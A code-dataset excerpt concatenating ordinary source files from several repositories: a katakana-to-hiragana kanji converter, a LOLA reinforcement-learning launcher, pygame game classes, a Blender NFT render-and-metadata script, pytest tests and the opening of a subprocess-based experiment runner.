if char == 'ー':
# new_char = kun_yomi[len(kun_yomi)-1]
kun_yomi += 'あ' # TODO dirty workaround for only occurence of 'ー' (ダース)
continue
# convert utf-9 string of single char to byte array holding its utf-8 codepoint
char_bytes = list(char.encode("utf-8"))
# skip non-katakana chars
if char_bytes[0] != 227:
continue
## assertion holds on full dataset
# assert (
# (char_bytes[1] == 130 and 161 <= char_bytes[2] <= 191)
# or
# (char_bytes[1] == 131 and 128 <= char_bytes[2] <= 182)
# ), "{} is not a katakana char: {}".format(char, char_bytes) # 82a1 <= ... <= 83B6
# change katakana char to equivalent hiragana char according to utf-8 codepoint table
if char_bytes[1] == 130: # 82
char_bytes[1] = 129
char_bytes[2] -= 32 # bf - 9f, distance of "ta"
elif char_bytes[1] == 131:
if char_bytes[2] < 160: # a0
char_bytes[1] = 129
char_bytes[2] += 32 # 9f - bf, distance of "mi"
else:
char_bytes[1] = 130
char_bytes[2] -= 32 # a0 - 80, distance of "mu"
else:
continue # skip non-katakana chars
# convert byte array holding utf-8 codepoint of single char back to utf-8 string
new_char = bytes(char_bytes).decode("utf-8")
# concatenate the characters
kun_yomi += new_char
return kun_yomi
def hiraganify_on_yomi(readings_on: list):
return list(map(hiraganify_single_on_yomi, readings_on))
def isolate_actual_readings(readings_kun: list):
return [extended_reading.split('.')[0] for extended_reading in readings_kun]
def cut_non_hiragana_chars(kun_yomi: str):
utf8_bytes = list(kun_yomi.encode("utf-8"))
hiragana_only = ""
for char in kun_yomi:
if char == 'ー':
hiragana_only += 'ー'
continue
if not stringutils.is_kana(char):
continue
# concatenate the characters
hiragana_only += char
return hiragana_only
def entry_list_to_map(entries_in: list):
kanji_dict = {}
for entry in entries_in:
kanji = entry.find("literal").text
readings_on = [reading.text for reading in entry.findall("reading_meaning/rmgroup/reading[@r_type='ja_on']")]
readings_kun = [reading.text for reading in entry.findall("reading_meaning/rmgroup/reading[@r_type='ja_kun']")]
readings_nanori = [reading.text for reading in entry.findall("reading_meaning/nanori")]
readings = hiraganify_on_yomi(readings_on) + list(
map(cut_non_hiragana_chars, isolate_actual_readings(readings_kun))
)
readings_nanori = list(map(cut_non_hiragana_chars, readings_nanori))
kanji_dict[kanji] = (readings, readings_nanori)
return kanji_dict
def convert():
tree = ET.parse(os.path.join(ROOT_DIR, "resources/kanjidic2/kanjidic2.xml"))
entries = tree.findall("character")
kanji_dict_map = entry_list_to_map(entries)
with open(os.path.join(ROOT_DIR, "bin_blobs/kanjidic2_hashtable.pkl"), 'wb') as f:
pickle.dump(kanji_dict_map, f, pickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
convert()
``` |
{
"source": "011235813/lola",
"score": 2
} |
#### File: lola/scripts/run_lola.py
```python
import click
import time
from lola import logger
from lola.envs import *
import sys
sys.path.append('../../lio/env/')
from room_symmetric_lola import EscapeRoom
from room_asymmetric_lola import EscapeRoomAsym
@click.command()
# Experiment parameters
@click.option("--exp_name", type=str, default="IPD",
help="Name of the experiment (and correspondingly environment).")
@click.option("--num_episodes", type=int, default=None,
help="Number of episodes.")
@click.option("--trace_length", type=int, default=None,
help="Lenght of the traces.")
@click.option("--exact/--no-exact", default=True,
help="Whether to run the exact version of LOLA.")
@click.option("--pseudo/--no-pseudo", default=False,
help="Only used with exact version of LOLA.")
@click.option("--grid_size", type=int, default=3,
help="Grid size of the coin game (used only for coin game).")
@click.option("--trials", type=int, default=2, help="Number of trials.")
@click.option("--n_agents", type=int, default=2, help="Number of agents.")
# Learning parameters
@click.option("--lola/--no-lola", default=True,
help="Add the crazy LOLA corrections to the computation.")
@click.option("--opp_model/--no-opp_model", default=False,
help="Whether to model opponent or use true parameters "
"(use only for coin game).")
@click.option("--mem_efficient/--no-mem_efficient", default=True,
help="Use a more memory efficient corrections method.")
@click.option("--lr", type=float, default=None,
help="Learning rate for Adam optimizer.")
@click.option("--lr_correction", type=float, default=1,
help="Learning rate for corrections.")
@click.option("--batch_size", type=int, default=None,
help="Number of episodes to optimize at the same time.")
@click.option("--bs_mul", type=int, default=1,
help="Number of episodes to optimize at the same time")
# Policy parameters
@click.option("--simple_net/--no-simple_net", default=True,
help="Use a simple policy (only for IPD and IMP).")
@click.option("--hidden", type=int, default=32,
help="Size of the hidden layer.")
@click.option("--num_units", type=int, default=64,
help="Number of units in the MLP.")
@click.option("--reg", type=float, default=0.,
help="Regularization parameter.")
@click.option("--gamma", type=float, default=None,
help="Discount factor.")
# Escape room parameters
@click.option("--sym/--asym", default=True,
help="Symmetric Escape Room.")
@click.option("--reward_type", type=str, default="continuous",
help="Continuous or discrete reward-giving actions.")
@click.option("--dirname", type=str, default="er-dc",
help="subfolder name to save log files.")
def main(exp_name, num_episodes, trace_length, exact, pseudo, grid_size,
trials, lr, lr_correction, batch_size, bs_mul, simple_net, hidden,
num_units, reg, gamma, lola, opp_model, mem_efficient, n_agents,
sym, reward_type, dirname):
# Sanity
assert exp_name in {"CoinGame", "IPD", "IMP", "escape-room"}
# Resolve default parameters
if exact:
num_episodes = 50 if num_episodes is None else num_episodes
trace_length = 200 if trace_length is None else trace_length
lr = 1. if lr is None else lr
elif exp_name in {"IPD", "IMP"}:
num_episodes = 600000 if num_episodes is None else num_episodes
trace_length = 150 if trace_length is None else trace_length
batch_size = 4000 if batch_size is None else batch_size
lr = 1. if lr is None else lr
elif exp_name == "CoinGame":
num_episodes = 100000 if num_episodes is None else num_episodes
trace_length = 150 if trace_length is None else trace_length
batch_size = 4000 if batch_size is None else batch_size
lr = 0.005 if lr is None else lr
elif exp_name == "escape-room":
num_episodes = 50000 if num_episodes is None else num_episodes
trace_length = 5 if trace_length is None else trace_length
batch_size = 50 if batch_size is None else batch_size
lr = 1. if lr is None else lr
# Import the right training function
if exact:
assert exp_name != "CoinGame", "Can't run CoinGame with --exact."
def run(env):
from lola.train_exact import train
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
simple_net=simple_net,
corrections=lola,
pseudo=pseudo,
num_hidden=hidden,
reg=reg,
lr=lr,
lr_correction=lr_correction,
gamma=gamma)
elif exp_name in {"IPD", "IMP"}:
def run(env):
from lola.train_pg import train
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
batch_size=batch_size,
gamma=gamma,
set_zero=0,
lr=lr,
corrections=lola,
simple_net=simple_net,
hidden=hidden,
mem_efficient=mem_efficient)
elif exp_name == "CoinGame":
def run(env):
from lola.train_cg import train
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
batch_size=batch_size,
bs_mul=bs_mul,
gamma=gamma,
grid_size=grid_size,
lr=lr,
corrections=lola,
opp_model=opp_model,
hidden=hidden,
mem_efficient=mem_efficient)
elif exp_name == "escape-room":
def run(env, logdir):
if not sym:
from lola.train_er_asym import train
else:
if reward_type == 'continuous':
from lola.train_er_discrete_continuous import train
elif n_agents == 2:
from lola.train_er import train
elif n_agents == 3:
from lola.train_er_3player import train
else:
raise ValueError("Only 2 or 3 agents are supported for Escape Room.")
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
batch_size=batch_size,
gamma=gamma,
set_zero=0,
lr=lr,
corrections=lola,
simple_net=simple_net,
hidden1=64,
hidden2=32,
mem_efficient=mem_efficient,
logdir=logdir)
# Instantiate the environment
if exp_name == "IPD":
env = IPD(trace_length)
gamma = 0.96 if gamma is None else gamma
elif exp_name == "IMP":
env = IMP(trace_length)
gamma = 0.9 if gamma is None else gamma
elif exp_name == "CoinGame":
env = CG(trace_length, batch_size, grid_size)
gamma = 0.96 if gamma is None else gamma
elif exp_name == "escape-room":
gamma = 0.99 if gamma is None else gamma
if not sym:
env = EscapeRoomAsym(trace_length)
else:
if reward_type == 'continuous':
# giving rewards is handled outside env for the
# case of continuous reward-giving actions
env = EscapeRoom(trace_length, n_agents,
incentivization_inside_env=False)
else:
env = EscapeRoom(trace_length, n_agents,
incentivization_inside_env=True)
# Run training
# for seed in range(trials):
for seed in range(0, 1):
# logdir = 'logs/{}/seed-{}'.format(exp_name, seed)
# logdir = 'logs/{}/inexact-seed-{}'.format(exp_name, seed)
# logdir = 'logs/{}/lr0p1-{}'.format(exp_name, seed)
# logdir = 'logs/{}/n{}-lr10-{}'.format(exp_name, n_agents, seed)
logdir = 'logs/{}/n{}-lr{}-{}'.format(
dirname, n_agents, str(lr).replace('.', 'p'), seed)
logger.configure(dir=logdir)
start_time = time.time()
run(env, logdir)
# run(env)
end_time = time.time()
logger.reset()
if __name__ == '__main__':
main()
``` |
{
"source": "0112leesy/2021-2-OSSProj-PlusAlpha-9",
"score": 4
} |
#### File: 2021-2-OSSProj-PlusAlpha-9/boss/Bullet.py
```python
from math import *
import pygame
from object.Object import Object
from pygame.math import Vector2
#보스의 발사체를 위한 총알 클래스 bullet class for boss bullet
class Bullet(Object): #extend Object
def __init__(self, img_path, size, velocity, fire_loc, target_loc):
super().__init__(img_path, size, velocity)
#calculate direction from fire_loc to target_loc
if((sqrt((target_loc[0] - fire_loc[0]) ** 2 + (target_loc[1] - fire_loc[1]) ** 2)) == 0):
self.dx=1
self.dy=1
else:
self.dx = int((velocity) * (target_loc[0] - fire_loc[0]) /
(sqrt((target_loc[0] - fire_loc[0]) ** 2 +
(target_loc[1] - fire_loc[1]) ** 2)))
self.dy = int((velocity) * (target_loc[1] - fire_loc[1]) /
(sqrt((target_loc[0] - fire_loc[0]) ** 2 +
(target_loc[1] - fire_loc[1]) ** 2)))
self.calc_dir(self.dx, self.dy)
self.x = fire_loc[0]
self.y = fire_loc[1]
def move(self,boundary,game): #move bullet
if (game.size[0] != self.boundary[0]) or (game.size[1] != self.boundary[1]):
self.on_resize(game)
self.calc_dir(self.dx, self.dy)
self.x += self.dx
self.y += self.dy
self.update_rect((self.x, self.y))
if self.y >= boundary[1] - self.sy or self.x>=boundary[0]-self.sx or self.x<0 or self.y< 0: #remove bullet if OOB
game.enemyBullets.remove(self)
def calc_dir(self, dx, dy):
direction = Vector2(dx,dy)
radius, angle = direction.as_polar()
self.img = pygame.transform.rotozoom(self.img, -angle - 90.0, 1)
```
#### File: 2021-2-OSSProj-PlusAlpha-9/menu/CharacterSelectMenu.py
```python
import pygame
import pygame_menu
from data.CharacterDataManager import *
from data.Defs import *
from data.Stage import Stage
from data.StageDataManager import *
from game.InfiniteGame import *
from game.StageGame import StageGame
from pygame_menu.baseimage import IMAGE_MODE_FILL, IMAGE_MODE_SIMPLE
from pygame_menu.locals import ALIGN_LEFT, ALIGN_RIGHT
from pygame_menu.utils import make_surface
# 캐릭터 선택 메뉴
class CharacterSelectMenu(pygame_menu.menu.Menu):
image_widget: 'pygame_menu.widgets.Image'
item_description_widget: 'pygame_menu.widgets.Label'
def __init__(self,screen,attr):
# 화면 받고 화면 크기 값 받기
self.screen = screen
self.size = screen.get_size()
menu_image = pygame_menu.baseimage.BaseImage(image_path='./Image/StartImage.png',drawing_mode=pygame_menu.baseimage.IMAGE_MODE_FILL)
mytheme = pygame_menu.themes.THEME_ORANGE.copy()
mytheme.background_color = menu_image
super().__init__('Select Character...', self.size[0], self.size[1],
theme=mytheme)
#선택된 스테이지
self.attr =attr
#캐릭터 데이터를 json에서 불러온다
self.character_data = CharacterDataManager.load()
self.show()
self.mainloop(self.screen,bgfun = self.check_resize)
def to_menu(self):
self.disable()
#메뉴 구성하고 보이기
def show(self):
#캐릭터 선택 메뉴 구성
characters = []
for idx in range(len(self.character_data)):
characters.append((self.character_data[idx].name, idx))
self.character_imgs = []
for idx in range(len(self.character_data)):
default_image = pygame_menu.BaseImage(
image_path=self.character_data[idx].img_path
).scale(0.5, 0.5)
self.character_imgs.append(default_image.copy())
self.character_selector = self.add.selector(
title='Character :\t',
items=characters,
onchange=self.on_selector_change
)
self.image_widget = self.add.image(
image_path=self.character_imgs[0],
padding=(25, 0, 0, 0) # top, right, bottom, left
)
self.item_description_widget = self.add.label(title = "Unlocked" if self.character_data[0].is_unlocked == True else "Locked")
self.frame_v = self.add.frame_v(350, 160, margin=(10, 0))
# 각 캐릭터의 능력치 표시
self.power = self.frame_v.pack(self.add.progress_bar(
title="Power",
default=int((self.character_data[0].missile_power/Default.character.value["max_stats"]["power"])*100),
progress_text_enabled = False,
box_progress_color = Color.RED.value
), ALIGN_RIGHT)
self.fire_rate = self.frame_v.pack(self.add.progress_bar(
title="Fire Rate",
default=int((Default.character.value["max_stats"]["fire_rate"]/self.character_data[0].org_fire_interval)*100),
progress_text_enabled = False,
box_progress_color =Color.BLUE.value
), ALIGN_RIGHT)
self.velocity = self.frame_v.pack(self.add.progress_bar(
title="Mobility",
default=int((self.character_data[0].org_velocity/Default.character.value["max_stats"]["mobility"])*100),
progress_text_enabled = False,
box_progress_color = Color.GREEN.value
), ALIGN_RIGHT)
self.add.button("PLAY",self.start_game)
# self.add.button("BACK",pygame_menu.events.BACK)
self.add.button("BACK",self.to_menu)
self.update_from_selection(int(self.character_selector.get_value()[0][1]))
def start_game(self): #게임 시작 함수
# 캐릭터 셀릭터가 선택하고 있는 데이터를 get_value 로 가져와서, 그 중 Character 객체를 [0][1]로 접근하여 할당
selected_idx = self.character_selector.get_value()[0][1]
#캐릭터가 열려있는지 확인
if (self.character_data[selected_idx].is_unlocked): #캐릭터가 열려있다면
if(isinstance(self.attr,InfiniteGame.Mode)): #인자가 난이도 모드의 객체이면 무한모드 실행
InfiniteGame(self.character_data[selected_idx],self.attr).main()
else: #인자가 스테이지 객체이면 스테이지 모드 실행
StageGame(self.character_data,self.character_data[selected_idx],self.attr).main()
else:
print("character locked")
print(self.character_data[selected_idx].name)
self.showCharactereLockedScreen(self.character_data[selected_idx].name)
# 잠긴 캐릭터 선택 시 보여지는 화면
def showCharactereLockedScreen(self, character):
characterlocked_theme = pygame_menu.themes.THEME_DARK.copy()
characterlocked_theme.title_bar_style = pygame_menu.widgets.MENUBAR_STYLE_SIMPLE
characterlocked_theme.title_close_button_cursor = pygame_menu.locals.CURSOR_HAND
characterlocked_theme.title_font_color = Color.WHITE.value
self.size = self.screen.get_size()
super().__init__('Character Locked!', self.size[0], self.size[1],
theme=characterlocked_theme)
if(character == 'F5S1'):
self.add.image(Images.F5S1_locked.value, scale=Scales.default.value)
elif(character == 'F5S4'):
self.add.image(Images.F5S4_locked.value, scale=Scales.default.value)
elif(character == 'Tank'):
self.add.image(Images.Tank_locked.value, scale=Scales.default.value)
self.add.label("")
self.add.button('back', self.back_from_locked)
self.mainloop(self.screen,bgfun = self.check_resize)
def back_from_locked(self):
self.disable()
self.__init__(self.screen, self.attr)
# 화면 크기 조정 감지 및 비율 고정
def check_resize(self):
if (self.size != self.screen.get_size()): #현재 사이즈와 저장된 사이즈 비교 후 다르면 변경
changed_screen_size = self.screen.get_size() #변경된 사이즈
ratio_screen_size = (changed_screen_size[0],changed_screen_size[0]*783/720) #y를 x에 비례적으로 계산
if(ratio_screen_size[0]<320): #최소 x길이 제한
ratio_screen_size = (494,537)
if(ratio_screen_size[1]>783): #최대 y길이 제한
ratio_screen_size = (720,783)
self.screen = pygame.display.set_mode(ratio_screen_size,
pygame.RESIZABLE)
window_size = self.screen.get_size()
new_w, new_h = 1 * window_size[0], 1 * window_size[1]
self.resize(new_w, new_h)
self.size = window_size
self._current._widgets_surface = make_surface(0,0)
print(f'New menu size: {self.get_size()}')
# 캐릭터 변경 시 실행
def on_selector_change(self, selected, value: int) -> None:
self.update_from_selection(value)
# 캐릭터 선택 시 캐릭터 이미지 및 능력치 위젯 업데이트
def update_from_selection(self, selected_value, **kwargs) -> None:
self.current = selected_value
self.image_widget.set_image(self.character_imgs[selected_value])
self.power.set_value(int((self.character_data[selected_value].missile_power/Default.character.value["max_stats"]["power"])*100))
self.fire_rate.set_value(int((Default.character.value["max_stats"]["fire_rate"]/self.character_data[selected_value].org_fire_interval)*100))
self.velocity.set_value(int((self.character_data[selected_value].org_velocity/Default.character.value["max_stats"]["mobility"])*100))
self.item_description_widget.set_title(title = "Unlocked" if self.character_data[selected_value].is_unlocked == True else "Locked")
``` |
{
"source": "011Xpl/3D-NFT",
"score": 2
} |
#### File: 011Xpl/3D-NFT/config.py
```python
## INPUT
#Code supporting `.blend` now. You can use all the extensions that Blender supports by editing the code.
## OUTPUT
#`.png` and Metadata Jsons
## **WARNING! DON'T FORGET!**
#1. Edit `data`
#2. Edit count of `createObj`
#3. Edit file name and file direction.
## DONATION
#Buy me a bear!
#ETH: 0x9904bFa1B183Eb9d9350A885Ddac8B1A8a80eb71
##RARITY
# weights=(10,10,10,10,10,50)
# edit this, line 153,155,157
import random
import json
import os
import bpy
import bmesh
import time
import sys
all_images = []
#ammount=1*6*6*6*1=216 count
data = {
"layers": [
{
"name": "Body",
"values": ["Yellow"]
},
{
"name": "Hat",
"values": ["Alchemist","Arcmage","Darkmage","Druid","Mage","Witch"]
},
{
"name": "Robe",
"values": ["Alchemist", "Arcmage","Darkmage", "Druid","Mage", "Witch"]
},
{
"name": "Staff",
"values": ["Alchemist", "Arcmage","Darkmage", "Druid","Mage", "Witch"]
},
{
"name": "Background",
"values": ["Black"]
}
]
}
def metadataa(fle,i,body,glass,bag,cap, wp):
x = open("C:\\Users\\pc\\Desktop\\test1\\json\\"+fle,'a+')
metadata ={
"name": "",
"description": "",
"image": "",
"edition": "",
"attributes": [
{
"trait_type": "Background",
"value": ""
},
{
"trait_type": "Body",
"value": ""
},
{
"trait_type": "Hat",
"value": ""
},
{
"trait_type": "Robe",
"value": ""
},
{
"trait_type": "Staff",
"value": ""
}
]}
metadata['name']="Axolot"
metadata['description']="It's just it"
metadata['image']="ipfs://random/"
metadata['edition']=i
for i in metadata['attributes']:
if (i["trait_type"]=="Background"):
i["value"] = wp
if (i["trait_type"]=="Body"):
i["value"] = body
if (i["trait_type"]=="Hat"):
i["value"] = glass
if (i["trait_type"]=="Robe"):
i["value"] = bag
if (i["trait_type"]=="Staff"):
i["value"] = cap
json_format = json.dumps(metadata, indent=2)
x.write(json_format)
def progress(count, total, status=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', status))
sys.stdout.flush()
def collections(collection, col_list):
col_list.append(collection.name)
for sub_collection in collection.children:
collections(sub_collection, col_list)
def clear():
collection = bpy.data.collections["Collection"]
meshes = set()
for obj in [o for o in collection.objects if o.type == 'MESH']:
bpy.data.objects.remove(obj)
meshes = set()
for obj in [o for o in collection.objects if o.type == 'LIGHT']:
bpy.data.objects.remove(obj)
def clear_bg():
collection = bpy.data.collections["Collection"]
meshes = set()
for obj in [o for o in collection.objects if o.type == 'MESH']:
if obj.name in "Plane":
bpy.data.objects.remove(obj)
def createDna(data):
new_image = {}
for layer in data["layers"]:
if (layer["name"]=="Background"):
new_image[layer["name"]] = random.choices(layer["values"])[0]
if (layer["name"]=="Body"):
new_image[layer["name"]] = random.choices(layer["values"])[0]
if (layer["name"]=="Hat"):
new_image[layer["name"]] = random.choices(layer["values"],weights=(10,10,10,10,10,50))[0]
if (layer["name"]=="Robe"):
new_image[layer["name"]] = random.choices(layer["values"], weights=(10,10,10,10,10,50))[0]
if (layer["name"]=="Staff"):
new_image[layer["name"]] = random.choices(layer["values"], weights=(10,10,10,10,10,50))[0]
if new_image in all_images:
print("GEN> DNA EXITS")
return createDna(data)
else:
print("GEN> NEW DNA: {}".format(new_image))
return new_image
def createObj(ammount,data):
for x in range(ammount):
new_dna = createDna(data)
all_images.append(new_dna)
for y in range(ammount):
clear()
rez_list = []
progress(y, ammount, status='')
z = y + 1
result_fbx = str(z)+".fbx"
result_png = str(z)+".png"
body_fbx=all_images[y]["Body"] +".blend"
glass_fbx=all_images[y]["Hat"] +".blend"
bag_fbx=all_images[y]["Robe"] +".blend"
cap_fbx=all_images[y]["Staff"] +".blend"
wp_fbx=all_images[y]["Background"] +".fbx"
result_json = str(z)+".json"
metadataa(result_json,z,all_images[y]["Body"],all_images[y]["Hat"], all_images[y]["Robe"],all_images[y]["Staff"],all_images[y]["Background"])
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Body\\{body_fbx}\\Collection\\")
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Hat\\{glass_fbx}\\Collection\\")
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Robe\\{bag_fbx}\\Collection\\")
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Staff\\{cap_fbx}\\Collection\\")
bpy.ops.import_scene.fbx(filepath="C:\\Users\\pc\\Desktop\\obj\\Background\\"+wp_fbx)
bpy.context.scene.render.filepath = "C:\\Users\\pc\\Desktop\\test1\\png\\"+ result_png
bpy.ops.render.render(use_viewport = True, write_still=True)
clear_bg()
collections(bpy.context.collection, rez_list)
for x in rez_list:
if x =="Collection":
print("passed")
else:
collection = bpy.data.collections[x]
bpy.data.collections.remove(collection)
clear()
if __name__ =="__main__":
#createObj(count,data)
createObj(1,data)
``` |
{
"source": "01210210/police-brutality",
"score": 3
} |
#### File: tools/tests/test_data_builder.py
```python
import pytest
from data_builder import title_to_name_date
tests = [
(
'Title here | May 30th',
('Title here', '2020-05-30', 'May 30th')
),
(
'Title here',
('Title here', '', '')
),
]
@pytest.mark.parametrize("input,expected", tests)
def test_title_to_name_date(input, expected):
assert title_to_name_date(input) == expected
def test_handle_missing_name(capsys):
title_missing_name = '| May 30th'
title_to_name_date(title_missing_name)
captured = capsys.readouterr()
assert "Failed name parse: missing name for" in str(captured)
@pytest.mark.skip(reason="failing test, need to handle this case")
def test_handle_name_with_multiple_pipes():
malformed_title = 'Thing happened | this day | May 30th'
result = title_to_name_date(malformed_title)
# what should happen here?
def test_handle_missing_date(capsys):
title_missing_date = 'Title thinger'
title_to_name_date(title_missing_date)
captured = capsys.readouterr()
assert "Failed date parse: missing date for" in str(captured)
def test_handle_weird_date_format(capsys):
title_with_bad_date = 'Title | Leb 21'
result = title_to_name_date(title_with_bad_date)
captured = capsys.readouterr()
assert "Failed date format parse for title" in str(captured)
@pytest.mark.skip(reason="failing test, need to handle this case")
def test_handle_nonexistant_date():
title_with_bad_date = 'Title | February 31st'
result = title_to_name_date(title_with_bad_date)
# what should happen here?
```
#### File: tools/tests/test_process_md_texts.py
```python
import pytest
from data_builder import process_md_texts
def test_handle_dc():
data = {'Washington DC': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n* https://twitter.com/"}
result = process_md_texts(data)
assert result[0]['city'] == 'DC'
def test_handle_missing_location():
data = {'Unknown Location': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n* https://twitter.com/"}
result = process_md_texts(data)
assert result[0]['city'] == ''
def test_handle_missing_links(capsys):
data = {'Washington DC': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n\n\n### Another Title | May 31\n\nDescription.\n\n**Links**\n\n"}
process_md_texts(data)
captured = capsys.readouterr()
assert "Failed links parse: missing links for" in str(captured)
def test_more_than_200_records_found():
pass
``` |
{
"source": "0152la/SpecAST",
"score": 2
} |
#### File: SpecAST/scripts/run_experiments.py
```python
import argparse
import datetime
import git
import logging
import math
import os
import random
import shlex
import shutil
import signal
import subprocess
import statistics
import sys
import time
import yaml
import pdb
###############################################################################
# Argument parsing
###############################################################################
parser = argparse.ArgumentParser(
description = "Metalib batch experiment generator and runner",
formatter_class = argparse.RawTextHelpFormatter)
parser.add_argument("config", type=str,
help = "Path to configuration yaml file.")
# MODE SETTINGS
parser.add_argument("--mode", choices=["count", "time", "generate"], default="count",
help = """Select the mode of the tool.
count - generate and execute a number of tests [DEFAULT]
time - generate and execute for a set amount of time
generate - generate single test case""")
parser.add_argument("--mode-val", type=int, default=100,
help = """Mode-dependent value selector. Set `-1` for infinity.
`count` mode - sets number of tests to generate
`time` mode - sets time to execute in seconds.""")
# PARAMETERS
parser.add_argument("--seed", type=int, default=random.randint(0, sys.maxsize),
help = "Seed to initialize random generator in script.")
parser.add_argument("--gen-timeout", type=int, default=30,
help = "Maximum time, in seconds, to allow generation for a test case.")
parser.add_argument("--run-timeout", type=int, default=120,
help = "Maximum time, in seconds, to allow execution of generated test cases.")
parser.add_argument("--stop-on-fail", action='store_true',
help = "If set, testing stops on first execution failure.")
parser.add_argument("--append-id", action='store_true',
help = "If set, appends a random numeric hash to the output folder")
# DEBUG OPTIONS
parser.add_argument("--debug", action='store_true',
help = "If set, emit runtime debug information")
parser.add_argument("--debug-to-file", action='store_true',
help = "If set, emits debug output to log file.")
parser.add_argument("--runtime-log", type=str, default="runtime.log",
help = "Name of log for runtime information.")
parser.add_argument("--stats-log", type=str, default="stats.log",
help = "Name of log file to store statistics about test executions.")
parser.add_argument("--log-all-tests", action='store_true',
help = "If set, saves all generated test files, instead of only the failing"
" ones.")
parser.add_argument("--always-log-out", action='store_true',
help = "If set, always prints the output of STDOUT and STDERR for test"\
" generation phases.")
# OTHER OPTIONS
parser.add_argument("--no-symlink", action='store_true',
help = "If set, will not symlink the testing folder for ease access to the "
"latest experimental run. Useful for running things in parallel.")
parser.add_argument("--print-cmd-out", action='store_true',
help = "If set, prints to console the STDOUT and STDERR for test"\
" generation phases.")
TIMEOUT_STR = "TIMEOUT"
###############################################################################
# Helper functions
###############################################################################
def exec_cmd(name, cmd, test_id, timeout=None, log_test=False):
if not timeout:
log_console.debug(f"Running {name} command:\n\t*** {cmd}")
else:
log_console.debug(f"Running {name} command with t/o {timeout}:\n\t*** {cmd}")
start_time = time.perf_counter()
cmd_proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, encoding="utf-8")
try:
out, err = cmd_proc.communicate(timeout=timeout)
exec_time = time.perf_counter() - start_time
proc_timeout = False
except subprocess.TimeoutExpired:
proc_timeout = True
cmd_proc.kill()
out, err = cmd_proc.communicate()
exec_time = TIMEOUT_STR
log_runtime.info(f"{name} return code: {cmd_proc.returncode}")
log_runtime.info(f"{name} duration: {exec_time}")
if cmd_proc.returncode != 0 or args.always_log_out:
if proc_timeout:
log_runtime.info(f"TIMEOUT {name} command")
else:
log_runtime.info(f"FAIL {name} command")
log_runtime.debug(f"STDOUT:\n{out}")
log_runtime.debug(f"STDERR:\n{err}")
if args.print_cmd_out:
log_console.info(f"STDOUT:\n{out}")
log_console.info(f"STDERR:\n{err}")
test_save_name = ""
if proc_timeout:
log_console.warning(f"Timeout {name} command for test count {test_id}!")
if log_test:
test_save_name = f"{test_id:07d}_{name}_timeout"
elif cmd_proc.returncode != 0:
log_console.warning(f"Failed {name} command for test count {test_id}!")
test_save_name = f"{test_id:07d}_{name}_fail"
elif log_test:
test_save_name = f"{test_id:07d}_{name}"
if test_save_name:
try:
shutil.copyfile(full_output_file_name, f"{save_test_folder}/{test_save_name}")
except FileNotFoundError:
pass
stats = {}
stats["exec_time"] = exec_time
stats["return_code"] = cmd_proc.returncode
return stats
def terminate_handler(sig, frame):
log_console.info(f"Received terminate signal, finishing...")
global terminate
terminate = True
def emit_times_stats(times, t_type, writer):
try:
writer.write(f"Average {t_type} times: ")
writer.write(str(statistics.mean([x for x in times if isinstance(x, float)])))
writer.write("\n")
writer.write(f"Median {t_type} times: ")
writer.write(str(statistics.median([x for x in times if isinstance(x, float)])))
writer.write("\n")
except statistics.StatisticsError:
writer.write(f"Average {t_type} times: all t/o\n")
writer.write(f"Median {t_type} times: all t/o\n")
def make_abs_path(pth, log, check_exists = False):
if not os.path.isabs(pth):
log.debug(f"Expanding found relative path `{pth}`.")
a_pth = os.path.abspath(pth)
try:
assert (not check_exists or os.path.exists(pth))
except AssertionError:
print(f"Inexistent absolute path `{a_pth}` expanded from relative path `{pth}`.")
return a_pth
log.debug(f"Returning found absolute path `{pth}`.")
return pth
def log_git_repo_data(pth, describer, writer):
try:
pth_repo = git.Repo(pth)
writer.write(f"{describer} version: {pth_repo.head.commit.hexsha}\n")
except (KeyError):
writer.write(f"{describer} version: KeyError\n")
except (git.exc.NoSuchPathError):
writer.write(f"{describer} version: NoSuchPathError\n")
except (git.exc.InvalidGitRepositoryError):
writer.write(f"{describer} version: InvalidGitRepoError\n")
###############################################################################
# Main function
###############################################################################
if __name__ == '__main__':
args = parser.parse_args()
signal.signal(signal.SIGTERM, terminate_handler)
if args.debug:
log_level = logging.DEBUG
else:
log_level = logging.INFO
log_console = logging.getLogger('console')
log_console_handler = logging.StreamHandler(sys.stdout)
log_console.addHandler(log_console_handler)
log_console.setLevel(log_level)
log_console.debug("Debug mode set")
log_console.debug(f"Setting mode {args.mode} with value {args.mode_val}")
log_console.debug(f"Setting seed {args.seed}")
random.seed(args.seed)
log_console.debug(f"Parsing YAML config file {args.config}")
with open(args.config, 'r') as config_fd:
config = yaml.load(config_fd, Loader=yaml.FullLoader)
config['working_dir'] = make_abs_path(config['working_dir'], log_console, True)
log_console.debug(f"Setting cwd to {config['working_dir']}")
os.chdir(config["working_dir"])
config['output_folder'] = make_abs_path(config['output_folder'], log_console)
symlink_name = f"{config['output_folder']}_last"
if args.append_id:
config['output_folder'] += f"_{random.getrandbits(20):07d}"
full_output_file_name = f"{config['output_folder']}/{config['output_file_name']}"
if os.path.exists(config['output_folder']):
log_console.debug(f"Removing existing output folder {config['output_folder']}.")
shutil.rmtree(config['output_folder'])
log_console.debug(f"Creating output folder {config['output_folder']}.")
os.makedirs(config['output_folder'], exist_ok=True)
if not args.no_symlink:
if os.path.exists(symlink_name):
os.remove(symlink_name)
os.symlink(config['output_folder'], symlink_name)
save_test_folder_name = "tests"
save_test_folder = f"{config['output_folder']}/{save_test_folder_name}"
os.makedirs(save_test_folder, exist_ok=False)
log_runtime_filename = args.runtime_log
log_console.debug(f"Setting runtime log file `{log_runtime_filename}`")
